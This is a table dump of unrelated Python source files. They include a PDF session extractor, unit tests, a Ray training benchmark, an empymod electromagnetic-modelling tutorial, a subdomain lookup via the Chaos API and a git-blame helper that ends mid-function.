id (stringlengths 3–8) | content (stringlengths 100–981k)
---|---|
55336
|
import pdfcutter
import helper
import json #For writing PDF Link JSON File
import os #To check if PDF Link JSON File exists
#get_session is the main method: it parses a session into a dict of Senats/Bundesrats texts
class MainExtractorMethod:
#In: TextExtractorHolder can't be initialized here yet (its params are only known in get_beschluesse_text), so the subclass itself is passed to __init__
def __init__(self, textExtractorHolderSubclass):
self.textExtractorHolderSubclass = textExtractorHolderSubclass #Needed for get_beschluesse_text and no cyclic dependencies
#In: Session Dict
#Out: Dict of "TOP: {'senat': senatsText, 'bundesrat': BRText}" entries
def get_session(self, session):
PDF_URLS = dict(self._get_pdf_urls())
URLFILENAME = "session_urls.json"
if not os.path.exists(URLFILENAME): #Create PDF Link JSON File
with open(URLFILENAME, 'w') as f: #MainExtractorMethod is overridden per county, so the FILENAME is always relative to that county's folder
json.dump(PDF_URLS, f)
try:
filename = helper.get_session_pdf_filename(session, PDF_URLS)
except KeyError:
return
return self.get_beschluesse_text(session, filename)
#Out: Dict of {sessionNumberOfBR: PDFWebLink} entries
#Differs greatly between counties, so each subclass implements it anew
def _get_pdf_urls(self):
raise NotImplementedError()
#Out: Dict of "TOP: {'senat': senatsText, 'bundesrat': BRText}" entries
#Extraction work done in AbstractSenatsAndBRTextExtractor Subclasses
def get_beschluesse_text(self, session, filename):
extractor = self.textExtractorHolderSubclass(filename, session)
return dict(extractor.getSenatsAndBRTextsForAllSessionTOPs())
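# --- Hypothetical usage sketch (illustration only; not part of the original module). ---
# The class name and URL below are made up; only the pattern follows the comments above:
# a county-specific subclass supplies _get_pdf_urls and passes its own
# TextExtractorHolder subclass to __init__ to avoid cyclic imports.
class ExampleCountyExtractorMethod(MainExtractorMethod):
    def _get_pdf_urls(self):
        # Yield {sessionNumberOfBR: PDFWebLink} entries for this county.
        yield "1000", "https://example.org/beschluesse/1000.pdf"
# extractor = ExampleCountyExtractorMethod(SomeCountyTextExtractorHolder)
# texts = extractor.get_session(session)  # -> {TOP: {'senat': ..., 'bundesrat': ...}}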
|
55340
|
class Solution:
# @param A : list of integers
# @return an integer
def solve(self, A):
s = set(A)
if len(s) == len(A):
return -1
for i in A:
if A.count(i) > 1:
return i
else:
return -1
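# Quick usage check (illustration only; not part of the original snippet).
# solve returns the first element, in list order, that occurs more than once,
# or -1 when all elements are distinct. Note that A.count inside the loop makes
# this O(n^2); tracking seen elements in a set would make it O(n).
if __name__ == "__main__":
    assert Solution().solve([3, 1, 4, 1, 5, 3]) == 3
    assert Solution().solve([1, 2, 3]) == -1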
|
55363
|
from yowsup.structs import ProtocolEntity, ProtocolTreeNode
class ChatstateProtocolEntity(ProtocolEntity):
'''
INCOMING
<chatstate from="<EMAIL>">
<{{composing|paused}}></{{composing|paused}}>
</chatstate>
OUTGOING
<chatstate to="<EMAIL>">
<{{composing|paused}}></{{composing|paused}}>
</chatstate>
'''
STATE_TYPING = "composing"
STATE_PAUSED = "paused"
STATES = (STATE_TYPING, STATE_PAUSED)
def __init__(self, _state):
super(ChatstateProtocolEntity, self).__init__("chatstate")
assert _state in self.__class__.STATES, "Expected chat state to be in %s, got %s" % (self.__class__.STATES, _state)
self._state = _state
def getState(self):
return self._state
def toProtocolTreeNode(self):
node = self._createProtocolTreeNode({}, None, data = None)
node.addChild(ProtocolTreeNode(self._state))
return node
def __str__(self):
out = "CHATSTATE:\n"
out += "State: %s\n" % self._state
return out
@staticmethod
def fromProtocolTreeNode(node):
return ChatstateProtocolEntity(
node.getAllChildren()[0].tag,
)
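# Minimal round-trip sketch (illustration only; assumes the yowsup ProtocolEntity /
# ProtocolTreeNode APIs used above behave as the methods expect).
if __name__ == "__main__":
    entity = ChatstateProtocolEntity(ChatstateProtocolEntity.STATE_TYPING)
    node = entity.toProtocolTreeNode()
    rebuilt = ChatstateProtocolEntity.fromProtocolTreeNode(node)
    assert rebuilt.getState() == ChatstateProtocolEntity.STATE_TYPING
    print(rebuilt)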
|
55395
|
import unittest
import imp
import sys
import shapy
class TestSettings(unittest.TestCase):
def setUp(self):
self.settings = imp.new_module('test_settings')
sys.modules.update(test_settings=self.settings)
setattr(self.settings, 'UNITS', 'override')
setattr(self.settings, 'NEW_OPTION', 'new')
def test_settings_override(self):
shapy.register_settings('test_settings')
from shapy import settings
self.assertEqual(settings.UNITS, 'override')
self.assertEqual(getattr(settings, 'NEW_OPTION', None), 'new')
|
55432
|
import json
import os
import time
import ray
from ray.train import Trainer
from ray.train.examples.horovod.horovod_example import (
train_func as horovod_torch_train_func,
)
if __name__ == "__main__":
ray.init(address=os.environ.get("RAY_ADDRESS", "auto"))
start_time = time.time()
num_workers = 8
num_epochs = 10
trainer = Trainer("horovod", num_workers)
trainer.start()
results = trainer.run(
horovod_torch_train_func, config={"num_epochs": num_epochs, "lr": 1e-3}
)
trainer.shutdown()
assert len(results) == num_workers
for worker_result in results:
assert len(worker_result) == num_epochs
assert worker_result[num_epochs - 1] < worker_result[0]
delta = time.time() - start_time
with open(os.environ["TEST_OUTPUT_JSON"], "w") as f:
f.write(json.dumps({"train_time": delta, "success": True}))
|
55438
|
import numpy as np
from gtsam import SfmTrack
from gtsfm.common.image import Image
import gtsfm.utils.images as image_utils
def test_get_average_point_color():
""" Ensure 3d point color is computed as mean of RGB per 2d measurement."""
# random point; 2d measurements below are dummy locations (not actual projection)
triangulated_pt = np.array([1, 2, 1])
track_3d = SfmTrack(triangulated_pt)
# in camera 0
track_3d.add_measurement(idx=0, m=np.array([130, 80]))
# in camera 1
track_3d.add_measurement(idx=1, m=np.array([10, 60]))
img0 = np.zeros((100, 200, 3), dtype=np.uint8)
img0[80, 130] = np.array([40, 50, 60])
img1 = np.zeros((100, 200, 3), dtype=np.uint8)
img1[60, 10] = np.array([60, 70, 80])
images = {0: Image(img0), 1: Image(img1)}
r, g, b = image_utils.get_average_point_color(track_3d, images)
assert r == 50
assert g == 60
assert b == 70
def test_get_downsampling_factor_per_axis_leaveintact() -> None:
"""Ensure that image is left intact, when shorter side is smaller than max_resolution."""
img_h = 700
img_w = 1500
img = Image(np.zeros((img_h, img_w, 3), dtype=np.uint8))
max_resolution = 800
scale_u, scale_v, new_h, new_w = image_utils.get_downsampling_factor_per_axis(img_h, img_w, max_resolution)
assert scale_u == 1.0
assert scale_v == 1.0
assert new_h == 700
assert new_w == 1500
def test_get_rescaling_factor_per_axis_upsample() -> None:
"""Ensure that max resolution constraint is met, when upsampling image.
Resize a 700x1500 image, so that the shorter image side is EXACTLY 800 px.
"""
img_h = 700
img_w = 1500
img = Image(np.zeros((img_h, img_w, 3), dtype=np.uint8))
max_resolution = 800
scale_u, scale_v, new_h, new_w = image_utils.get_rescaling_factor_per_axis(img_h, img_w, max_resolution)
# 8/7 will not give a clean integer division
assert np.isclose(scale_u, 1.1427, atol=1e-4)
assert np.isclose(scale_v, 1.1429, atol=1e-4)
assert new_h == 800
assert new_w == 1714
def test_get_downsampling_factor_per_axis() -> None:
"""Ensure that max resolution constraint is met, when downsampling image.
Resize a 700x1500 image, so that the shorter image side is AT MOST 600 px.
Image is in landscape mode.
"""
img_h = 700
img_w = 1500
img = Image(np.zeros((img_h, img_w, 3), dtype=np.uint8))
max_resolution = 600
scale_u, scale_v, new_h, new_w = image_utils.get_downsampling_factor_per_axis(img_h, img_w, max_resolution)
# Note that 600 / 700 = 0.85714
# 1500 * 0.85714 = 1285.7, which we round up to 1286.
assert np.isclose(scale_u, 0.8573, atol=1e-4)
assert np.isclose(scale_v, 0.8571, atol=1e-4)
assert new_h == 600
assert new_w == 1286
def test_get_rescaling_factor_per_axis_downsample() -> None:
"""Ensure that max resolution constraint is met, when downsampling image.
Resize a 700x1500 image, so that the shorter image side is EXACTLY 600 px.
Image is in landscape mode.
"""
img_h = 700
img_w = 1500
img = Image(np.zeros((img_h, img_w, 3), dtype=np.uint8))
max_resolution = 600
scale_u, scale_v, new_h, new_w = image_utils.get_rescaling_factor_per_axis(img_h, img_w, max_resolution)
# Note that 600 / 700 = 0.85714
# 1500 * 0.85714 = 1285.7, which we round up to 1286.
assert np.isclose(scale_u, 0.8573, atol=1e-4)
assert np.isclose(scale_v, 0.8571, atol=1e-4)
assert new_h == 600
assert new_w == 1286
def test_get_downsampling_factor_per_axis_portrait() -> None:
"""Ensure that max resolution constraint is met, when downsampling image.
Resize a 700x1500 image, so that the shorter image side is AT MOST 600 px.
Image is in portrait mode.
"""
img_h = 1500
img_w = 700
img = Image(np.zeros((img_h, img_w, 3), dtype=np.uint8))
max_resolution = 600
scale_u, scale_v, new_h, new_w = image_utils.get_downsampling_factor_per_axis(img_h, img_w, max_resolution)
# Note that 600 / 700 = 0.85714
# 1500 * 0.85714 = 1285.7, which we round up to 1286.
assert np.isclose(scale_u, 0.8571, atol=1e-4)
assert np.isclose(scale_v, 0.8573, atol=1e-4)
assert new_h == 1286
assert new_w == 600
def test_get_rescaling_factor_per_axis_downsample_portrait() -> None:
"""Ensure that max resolution constraint is met, when downsampling image.
Resize a 700x1500 image, so that the shorter image side is EXACTLY 600 px.
Image is in portrait mode.
"""
img_h = 1500
img_w = 700
img = Image(np.zeros((img_h, img_w, 3), dtype=np.uint8))
max_resolution = 600
scale_u, scale_v, new_h, new_w = image_utils.get_rescaling_factor_per_axis(img_h, img_w, max_resolution)
# Note that 600 / 700 = 0.85714
# 1500 * 0.85714 = 1285.7, which we round up to 1286.
assert np.isclose(scale_v, 0.8571, atol=1e-4)
assert np.isclose(scale_u, 0.8573, atol=1e-4)
assert new_h == 1286
assert new_w == 600
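def _rescaling_factors_sketch(img_h: int, img_w: int, max_resolution: int):
    """Reference sketch (illustration only; NOT gtsfm's actual implementation).

    All the rescaling tests above assume the same behaviour: scale the image so
    that its shorter side becomes exactly max_resolution, round the longer side
    to the nearest pixel, and report per-axis factors (u = width, v = height).
    The downsampling variant additionally leaves the image intact when the
    shorter side is already at or below max_resolution.
    """
    shorter = min(img_h, img_w)
    scale = max_resolution / shorter
    new_h = max_resolution if shorter == img_h else int(round(img_h * scale))
    new_w = max_resolution if shorter == img_w else int(round(img_w * scale))
    return new_w / img_w, new_h / img_h, new_h, new_w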
|
55456
|
r"""
Difference between magnetic dipole and loop sources
===================================================
In this example we look at the differences between an electric loop, which
results in a magnetic source, and a magnetic dipole source.
The derivation of the electromagnetic field in Hunziker et al. (2015) is for
electric and magnetic point-dipole sources and receivers. The magnetic field
due to a magnetic source (:math:`mm`) is obtained from the electric field due to
an electric source (:math:`ee`) using the duality principle, given in their
Equation (11),
.. math::
\hat{G}^{mm}_{pq}(\mathbf{x}, \mathbf{x'}, s, \eta_{kr}, \zeta_{ij}) =
-\hat{G}^{ee}_{pq}(\mathbf{x}, \mathbf{x'}, s, -\zeta_{kr}, -\eta_{ij}) \,
. \qquad (1)
Without going into the details of the different parameters, we can focus on the
difference between the :math:`mm` and :math:`ee` fields for a homogeneous,
isotropic fullspace by simplifying this further to
.. math::
\mathbf{G}^{mm}_\text{dip-dip} = \frac{\eta}{\zeta}\mathbf{G}^{ee} \quad
\xrightarrow{\text{diff. approx}} \quad \frac{\sigma}{\mathrm{i}\omega
\mu}\mathbf{G}^{ee}_\text{dip-dip} \, . \qquad (2)
Here, :math:`\sigma` is conductivity (S/m), :math:`\omega=2\pi f` is angular
frequency (Hz), and :math:`\mu` is the magnetic permeability (H/m). So from
Equation (2) we see that the :math:`mm` field differs from the :math:`ee`
field by a factor :math:`\sigma/(\mathrm{i}\omega\mu)`.
A magnetic dipole source has a moment of :math:`I^m ds`; however, a magnetic
dipole source is hardly ever used in geophysics. Instead, a loop of electric
wire is used, which generates a magnetic field. The moment generated
by this loop is given by :math:`I^m = \mathrm{i}\omega\mu N A I^e`, where
:math:`A` is the area of the loop (m:math:`^2`), and :math:`N` the number of
turns of the loop. So the difference between a unit magnetic dipole and a unit
loop (:math:`A=1, N=1`) is the factor :math:`\mathrm{i}\omega\mu`, hence
Equation (2) becomes
.. math::
\mathbf{G}^{mm}_\text{loop-dip} =
\mathrm{i}\omega\mu\mathbf{G}^{mm}_\text{dip-dip} =
\sigma\,\mathbf{G}^{ee}_\text{dip-dip} \, . \qquad (3)
This notebook shows this relation in the frequency domain, as well as for
impulse, step-on, and step-off responses in the time domain.
We can actually model an **electric loop** instead of adjusting the magnetic
dipole solution to correspond to a loop source. This is shown in the second
part of the notebook.
**References**
- <NAME>., <NAME>, and <NAME>, 2015, The electromagnetic response
in a layered vertical transverse isotropic medium: A new look at an old
problem: Geophysics, 80(1), F1–F18; DOI: `10.1190/geo2013-0411.1
<https://doi.org/10.1190/geo2013-0411.1>`_.
"""
import empymod
import numpy as np
import matplotlib.pyplot as plt
plt.style.use('ggplot')
# sphinx_gallery_thumbnail_number = 3
###############################################################################
# 1. Using the magnetic dipole solution
# -------------------------------------
#
# Survey parameters
# ~~~~~~~~~~~~~~~~~
#
# - Homogeneous fullspace of :math:`\sigma` = 0.01 S/m.
# - Source at the origin, x-directed.
# - Inline receiver with offset of 100 m, x-directed.
freq = np.logspace(-1, 5, 301) # Frequencies (Hz)
time = np.logspace(-6, 0, 301) # Times (s)
src = [0, 0, 0, 0, 0] # x-dir. source at the origin [x, y, z, azimuth, dip]
rec = [100, 0, 0, 0, 0] # x-dir. receiver 100m away from source, inline
cond = 0.01 # Conductivity (S/m)
###############################################################################
# Computation using ``empymod``
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Collect common parameters
inp = {'src': src, 'rec': rec, 'depth': [], 'res': 1/cond, 'verb': 1}
# Frequency domain
inp['freqtime'] = freq
fee_dip_dip = empymod.bipole(**inp)
fmm_dip_dip = empymod.bipole(msrc=True, mrec=True, **inp)
f_loo_dip = empymod.loop(**inp)
# Time domain
inp['freqtime'] = time
# ee
ee_dip_dip_of = empymod.bipole(signal=-1, **inp)
ee_dip_dip_im = empymod.bipole(signal=0, **inp)
ee_dip_dip_on = empymod.bipole(signal=1, **inp)
# mm dip-dip
dip_dip_of = empymod.bipole(signal=-1, msrc=True, mrec=True, **inp)
dip_dip_im = empymod.bipole(signal=0, msrc=True, mrec=True, **inp)
dip_dip_on = empymod.bipole(signal=1, msrc=True, mrec=True, **inp)
# mm loop-dip
loo_dip_of = empymod.loop(signal=-1, **inp)
loo_dip_im = empymod.loop(signal=0, **inp)
loo_dip_on = empymod.loop(signal=1, **inp)
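###############################################################################
# Quick numerical check of Equations (2) and (3)
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# (Added illustration, not part of the original example; magnitudes only, to
# stay independent of sign conventions.) The loop-dipole field should be a
# factor :math:`\omega\mu` larger than the magnetic dipole-dipole field and,
# within the diffusive approximation, a factor :math:`\sigma` times the
# electric dipole-dipole field; small deviations remain because the full
# :math:`\eta = \sigma + \mathrm{i}\omega\varepsilon` is used.
omega_mu = 2 * np.pi * freq * 4e-7 * np.pi  # omega * mu_0
print("Max. rel. deviation of |loop-dip| / |mm dip-dip| from omega*mu_0:",
      np.max(np.abs(np.abs(f_loo_dip) / np.abs(fmm_dip_dip) / omega_mu - 1)))
print("Max. rel. deviation of |loop-dip| / |ee dip-dip| from sigma:",
      np.max(np.abs(np.abs(f_loo_dip) / np.abs(fee_dip_dip) / cond - 1)))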
###############################################################################
# Plot the result
# ~~~~~~~~~~~~~~~
fs = 16 # Fontsize
# Figure
fig = plt.figure(figsize=(12, 8))
# Frequency Domain
plt.subplot(231)
plt.title(r'$G^{ee}_{\rm{dip-dip}}$', fontsize=fs)
plt.plot(freq, fee_dip_dip.real, 'C0-', label='Real')
plt.plot(freq, -fee_dip_dip.real, 'C0--')
plt.plot(freq, fee_dip_dip.imag, 'C1-', label='Imag')
plt.plot(freq, -fee_dip_dip.imag, 'C1--')
plt.xscale('log')
plt.yscale('log')
plt.ylim([5e-8, 2e-5])
ax1 = plt.subplot(232)
plt.title(r'$G^{mm}_{\rm{dip-dip}}$', fontsize=fs)
plt.plot(freq, fmm_dip_dip.real, 'C0-', label='Real')
plt.plot(freq, -fmm_dip_dip.real, 'C0--')
plt.plot(freq, fmm_dip_dip.imag, 'C1-', label='Imag')
plt.plot(freq, -fmm_dip_dip.imag, 'C1--')
plt.xscale('log')
plt.yscale('log')
plt.xlabel('Frequency (Hz)', fontsize=fs-2)
plt.legend()
plt.subplot(233)
plt.title(r'$G^{mm}_{\rm{loop-dip}}$', fontsize=fs)
plt.plot(freq, f_loo_dip.real, 'C0-', label='Real')
plt.plot(freq, -f_loo_dip.real, 'C0--')
plt.plot(freq, f_loo_dip.imag, 'C1-', label='Imag')
plt.plot(freq, -f_loo_dip.imag, 'C1--')
plt.xscale('log')
plt.yscale('log')
plt.ylim([5e-10, 2e-7])
plt.text(1.05, 0.5, "Frequency Domain", {'fontsize': fs},
horizontalalignment='left', verticalalignment='center',
rotation=-90, clip_on=False, transform=plt.gca().transAxes)
# Time Domain
plt.subplot(234)
plt.plot(time, ee_dip_dip_of, 'C0-', label='Step-Off')
plt.plot(time, -ee_dip_dip_of, 'C0--')
plt.plot(time, ee_dip_dip_im, 'C1-', label='Impulse')
plt.plot(time, -ee_dip_dip_im, 'C1--')
plt.plot(time, ee_dip_dip_on, 'C2-', label='Step-On')
plt.plot(time, -ee_dip_dip_on, 'C2--')
plt.xscale('log')
plt.yscale('log')
plt.subplot(235)
plt.plot(time, dip_dip_of, 'C0-', label='Step-Off')
plt.plot(time, -dip_dip_of, 'C0--')
plt.plot(time, dip_dip_im, 'C1-', label='Impulse')
plt.plot(time, -dip_dip_im, 'C1--')
plt.plot(time, dip_dip_on, 'C2-', label='Step-On')
plt.plot(time, -dip_dip_on, 'C2--')
plt.xscale('log')
plt.yscale('log')
plt.xlabel('Time (s)', fontsize=fs-2)
plt.legend()
plt.subplot(236)
plt.plot(time, loo_dip_of, 'C0-', label='Step-Off')
plt.plot(time, -loo_dip_of, 'C0--')
plt.plot(time, loo_dip_im, 'C1-', label='Impulse')
plt.plot(time, -loo_dip_im, 'C1--')
plt.plot(time, loo_dip_on, 'C2-', label='Step-On')
plt.plot(time, -loo_dip_on, 'C2--')
plt.xscale('log')
plt.yscale('log')
plt.text(1.05, 0.5, "Time Domain", {'fontsize': fs},
horizontalalignment='left', verticalalignment='center',
rotation=-90, clip_on=False, transform=plt.gca().transAxes)
fig.text(-0.01, 0.5, 'Amplitude; e-rec (V/m); m-rec (A/m)',
va='center', rotation='vertical', fontsize=fs, color='.4')
plt.tight_layout()
plt.show()
###############################################################################
# The figure shows the main points of Equations (2) and (3):
#
# - The magnetic dipole-dipole response differs by a factor
# :math:`\sigma/(\mathrm{i}\omega\mu)` from the electric dipole-dipole
# response. That means for the time-domain that the magnetic response looks
# more like the time derivative of the electric response (e.g., the magnetic
# impulse responses resembles the electric step-on response).
# - The magnetic loop-dipole response differs only by :math:`\sigma` from the
# electric dipole-dipole response, hence a factor of 0.01.
#
# The units of the response depend only on the receiver, i.e., on what the
# receiver actually measures. Changing the source from a dipole to a loop
# therefore does not change the units of the received responses.
#
# 2. Using an electric loop
# -------------------------
#
# We can use ``empymod`` to model arbitrarily shaped sources by simply adding
# point dipole sources together. This is what ``empymod`` does internally to
# model a finite length dipole (``empymod.bipole``), where it uses a Gaussian
# quadrature with a few points.
#
# Here, we are going to compare the result from ``loop``, as presented above,
# with two different simulations of an electric loop source, assuming a square
# loop whose sides are 1 m long, so its area corresponds to one square metre.
#
# Plotting routines
# ~~~~~~~~~~~~~~~~~
def plot_result(data1, data2, x, title, vmin=-15., vmax=-7., rx=0):
"""Plot result."""
fig = plt.figure(figsize=(18, 10))
def setplot(name):
"""Plot settings"""
plt.title(name)
plt.xlim(rx.min(), rx.max())
plt.ylim(rx.min(), rx.max())
plt.axis("equal")
# Plot Re(data)
ax1 = plt.subplot(231)
setplot(r"(a) |Re(magn.dip*iwu)|")
cf0 = plt.pcolormesh(rx, rx, np.log10(np.abs(data1.real)), linewidth=0,
rasterized=True, cmap="viridis", vmin=vmin, vmax=vmax,
shading='nearest')
ax2 = plt.subplot(232)
setplot(r"(b) |Re(el. square)|")
plt.pcolormesh(rx, rx, np.log10(np.abs(data2.real)), linewidth=0,
rasterized=True, cmap="viridis", vmin=vmin, vmax=vmax,
shading='nearest')
ax3 = plt.subplot(233)
setplot(r"(c) Error real part")
error_r = np.abs((data1.real-data2.real)/data1.real)*100
cf2 = plt.pcolormesh(rx, rx, np.log10(error_r), vmin=-2, vmax=2,
linewidth=0, rasterized=True,
cmap=plt.cm.get_cmap("RdBu_r", 8),
shading='nearest')
# Plot Im(data)
ax4 = plt.subplot(234)
setplot(r"(d) |Im(magn.dip*iwu)|")
plt.pcolormesh(rx, rx, np.log10(np.abs(data1.imag)), linewidth=0,
rasterized=True, cmap="viridis", vmin=vmin, vmax=vmax,
shading='nearest')
ax5 = plt.subplot(235)
setplot(r"(e) |Im(el. square)|")
plt.pcolormesh(rx, rx, np.log10(np.abs(data2.imag)), linewidth=0,
rasterized=True, cmap="viridis", vmin=vmin, vmax=vmax,
shading='nearest')
ax6 = plt.subplot(236)
setplot(r"(f) Error imag part")
error_i = np.abs((data1.imag-data2.imag)/data1.imag)*100
plt.pcolormesh(rx, rx, np.log10(error_i), vmin=-2, vmax=2,
linewidth=0, rasterized=True,
cmap=plt.cm.get_cmap("RdBu_r", 8),
shading='nearest')
# Colorbars
fig.colorbar(cf0, ax=[ax1, ax2, ax3], label=r"$\log_{10}$ Amplitude (A/m)")
cbar = fig.colorbar(cf2, ax=[ax4, ax5, ax6], label=r"Relative Error")
cbar.set_ticks([-2, -1, 0, 1, 2])
cbar.ax.set_yticklabels([r"$0.01\,\%$", r"$0.1\,\%$", r"$1\,\%$",
r"$10\,\%$", r"$100\,\%$"])
# Axis label
fig.text(0.4, 0.05, "Inline Offset (m)", fontsize=14)
fig.text(0.08, 0.5, 'Crossline Offset (m)', rotation=90, fontsize=14)
# Title
fig.suptitle(title, y=.95, fontsize=20)
plt.show()
###############################################################################
# Model parameters
# ~~~~~~~~~~~~~~~~
#
# - Resistivity: :math:`1 \Omega` m fullspace
#
# Survey
# ~~~~~~
#
# - Source at [0, 0, 0]
# - Receivers at [x, y, 10]
# - Frequency: 100 Hz
# - Offsets: -250 m to 250 m
# Survey parameters
x = ((np.arange(502))-250.5)
rx = np.repeat([x, ], np.size(x), axis=0)
ry = rx.transpose()
rxx = rx.ravel()
ryy = ry.ravel()
# Model
model = {
'depth': [], # Fullspace
'res': 1., # 1 Ohm.m
'freqtime': 100, # 100 Hz
'htarg': {'pts_per_dec': -1},
'verb': 1,
}
###############################################################################
# Compute ``empymod.loop`` result
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
epm_loop = empymod.loop(src=[0, 0, 0, 0, 90], rec=[rxx, ryy, 10, 0, 0],
**model).reshape(np.shape(rx))
###############################################################################
# 2.1 Point dipoles at (x, y) using ``empymod.dipole``
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# - (0.5, 0), ab=42
# - (0, 0.5), ab=41
# - (-0.5, 0), ab=-42
# - (0, -0.5), ab=-41
#
rec_dip = [rxx, ryy, 10]
square_pts = +empymod.dipole(src=[+0.5, +0.0, 0], rec=rec_dip, ab=42,
**model).reshape(np.shape(rx))
square_pts += empymod.dipole(src=[+0.0, +0.5, 0], rec=rec_dip, ab=41,
**model).reshape(np.shape(rx))
square_pts -= empymod.dipole(src=[-0.5, +0.0, 0], rec=rec_dip, ab=42,
**model).reshape(np.shape(rx))
square_pts -= empymod.dipole(src=[+0.0, -0.5, 0], rec=rec_dip, ab=41,
**model).reshape(np.shape(rx))
plot_result(epm_loop, square_pts, x, 'Loop made of four points',
vmin=-13, vmax=-5, rx=x)
###############################################################################
# 2.2 Finite length dipoles using ``empymod.bipole``
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Each simulated with a 5pt Gaussian quadrature. The dipoles are:
#
# - (-0.5, -0.5) to (+0.5, -0.5)
# - (+0.5, -0.5) to (+0.5, +0.5)
# - (+0.5, +0.5) to (-0.5, +0.5)
# - (-0.5, +0.5) to (-0.5, -0.5)
inp_dip = {
'rec': [rxx, ryy, 10, 0, 0],
'mrec': True,
'srcpts': 5 # Gaussian quadr. with 5 pts to simulate a finite length dip.
}
square_dip = +empymod.bipole(src=[+0.5, +0.5, -0.5, +0.5, 0, 0],
**inp_dip, **model)
square_dip += empymod.bipole(src=[+0.5, -0.5, +0.5, +0.5, 0, 0],
**inp_dip, **model)
square_dip += empymod.bipole(src=[-0.5, -0.5, +0.5, -0.5, 0, 0],
**inp_dip, **model)
square_dip += empymod.bipole(src=[-0.5, +0.5, -0.5, -0.5, 0, 0],
**inp_dip, **model)
square_dip = square_dip.reshape(np.shape(rx))
plot_result(epm_loop, square_dip, x, 'Loop made of four dipoles',
vmin=-13, vmax=-5, rx=x)
###############################################################################
# Close to the source the results between
#
# - (1) a magnetic dipole,
# - (2) an electric loop consisting of four point sources, and
# - (3) an electric loop consisting of four finite length dipoles,
#
# differ, as expected. Over the vast majority of the domain, however, they are
# identical. The skin depth for our example with :math:`\rho=1\Omega` m and
# :math:`f=100` Hz is roughly 50 m, so the results are essentially identical out
# to 4-5 skin depths, beyond which the signal is very low.
empymod.Report()
|
55462
|
from __future__ import absolute_import
from django.core.urlresolvers import reverse
from sentry.testutils import APITestCase
from sentry.models import UserReport
class ProjectUserReportsTest(APITestCase):
def test_simple(self):
self.login_as(user=self.user)
project = self.create_project()
group = self.create_group(project=project)
report_1 = UserReport.objects.create(
project=project,
event_id='a' * 32,
name='Foo',
email='<EMAIL>',
comments='Hello world',
group=group,
)
# should not be included due to missing link
UserReport.objects.create(
project=project,
event_id='b' * 32,
name='Bar',
email='<EMAIL>',
comments='Hello world',
)
url = reverse('sentry-api-0-project-user-reports', kwargs={
'organization_slug': project.organization.slug,
'project_slug': project.slug,
})
response = self.client.get(url, format='json')
assert response.status_code == 200, response.content
assert len(response.data) == 1
assert sorted(map(lambda x: x['id'], response.data)) == sorted([
str(report_1.id),
])
|
55466
|
import requests
from json import loads
from termcolor import colored
from configparser import RawConfigParser
def init(domain):
PDCH = []
print(colored("[*]-Searching Project Discovery Chaos...", "yellow"))
parser = RawConfigParser()
parser.read("config.ini")
CHAOS_KEY = parser.get("PDChaos", "CHAOS_API_KEY")
if CHAOS_KEY == "":
print(" \__", colored("No Project Discovery Chaos API key configured", "red"))
return []
headers = {"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0", "Authorization": CHAOS_KEY}
url = "https://dns.projectdiscovery.io/dns/{0}/subdomains".format(domain)
try:
response = requests.get(url, headers=headers).text
subdomains = loads(response)["subdomains"]
for subdomain in subdomains:
if subdomain:
PDCH.append("{0}.{1}".format(subdomain, domain))
PDCH = set(PDCH)
print(" \__ {0}: {1}".format(colored("Subdomains found", "cyan"), colored(len(PDCH), "yellow")))
return PDCH
except requests.exceptions.HTTPError as errh:
print(" \__", colored(errh, "red"))
return []
except requests.exceptions.ConnectionError as errc:
print(" \__", colored(errc, "red"))
return []
except requests.exceptions.Timeout as errt:
print(" \__", colored(errt, "red"))
return []
# RequestException is the base class of the handlers above, so it must come
# last; otherwise the more specific handlers would be unreachable.
except requests.exceptions.RequestException as err:
print(" \__", colored(err, "red"))
return []
except Exception:
print(" \__", colored("Something went wrong!", "red"))
return []
|
55467
|
from pathlib import Path
def absolute_path(path):
src_path = str(Path(__file__).parent.resolve())
return src_path + "/" + path
# Paths
DATASET_DIRECTORY = absolute_path("../dataset")
CLEAN_DATA_PATH = absolute_path("clean_data")
TIME_SERIES_PATH = absolute_path("clean_data/series.npy")
TRAINED_MODELS_PATH = absolute_path("trained_models")
SCALER_PATH = absolute_path("trained_models/scaler.pkl")
GRU_PATH = absolute_path("trained_models/gru.hdf5")
LSTM_PATH = absolute_path("trained_models/lstm.hdf5")
XGB_MSE_REGRESSOR_PATH = absolute_path("trained_models/xgb-mse.json")
XGB_HUBBER_REGRESSOR_PATH = absolute_path("trained_models/xgb-hub.json")
XGB_QUANTILE_REGRESSOR_PREFIX = absolute_path("trained_models/xgb-")
ENSEMBLE_MODEL_PATH = absolute_path("trained_models/ensemble.hdf5")
SL_DATASET_TEMPLATE = absolute_path("clean_data/dataset-{}.npz")
# Create directories if not exist
Path(TRAINED_MODELS_PATH).mkdir(parents=False, exist_ok=True)
Path(CLEAN_DATA_PATH).mkdir(parents=False, exist_ok=True)
# Training set size.
LVL_0_TRAIN_SIZE = 450000
LVL_1_TRAIN_SIZE = 105000
# Default batch size for every model
DEFAULT_BATCH_SIZE = 1000
# Dataset repetitions (data augmentation).
# XGB regressors seem to work better without data augmentation.
DATA_REPETITIONS_XGB = 1
# NN models seem to work better with 3 dataset repetitions.
DATA_REPETITIONS_NN = 3
|
55472
|
import subprocess
import os
def getBlame(f):
folder = os.path.split(f)[0]
cwd = os.getcwd()
os.chdir(folder)
cmd = "git blame --abbrev=0 -e \"" + f + "\""
try:
sub = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
response, err = sub.communicate()
response = response.decode()
err = err.decode()
except subprocess.CalledProcessError as e:
print("Error: " + e.output)
response = ''
except UnicodeDecodeError as e:
print("Error: UnicodeDecodeError")
response = ''
if len(err) > 0:
if "no such path" in err:
response = '' # Ignore new file.
else:
print("Error: " + err)
response = ''
if response == '':
data_by_line = None
else:
data_by_line = response.split('\n')
os.chdir(cwd)
return data_by_line
def getAuthor(f,line):
author = 'Not found'
line += 1 # no line zero.
folder = os.path.split(f)[0]
cwd = os.getcwd()
os.chdir(folder)
